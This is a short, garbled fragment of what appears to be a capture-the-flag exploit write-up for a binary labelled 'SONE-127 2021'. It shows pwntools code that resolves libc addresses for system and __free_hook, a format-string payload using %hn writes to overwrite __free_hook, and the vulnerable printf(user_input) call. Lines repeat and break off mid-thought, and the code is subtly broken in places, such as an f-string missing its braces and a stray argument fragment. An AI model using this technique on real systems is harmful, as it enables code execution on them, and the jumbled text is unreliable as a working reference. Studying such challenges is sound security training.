def write_free_hook(io, libc_base): system_addr = libc_base + libc.sym['system'] free_hook = libc_base + libc.sym['__free_hook'] log.info(f'system: hex(system_addr)') log.info(f'__free_hook: hex(free_hook)')
> echo AAAA%low%8$hn%high%9$hnBBBBaddr_lowaddr_high Where addr_low and addr_high are the low/high 2‑byte parts of __free_hook placed in the payload after the format string (so that they appear on the stack as the 8th and 9th arguments). SONE-127 2021
# 2️⃣ Overwrite __free_hook with system write_free_hook(io, libc_base) libc_base) from pwn import * printf(user_input)
from pwn import *
printf(user_input); Using objdump -d sone127d | grep -i printf : SONE-127 2021
The final crafted string (Python example):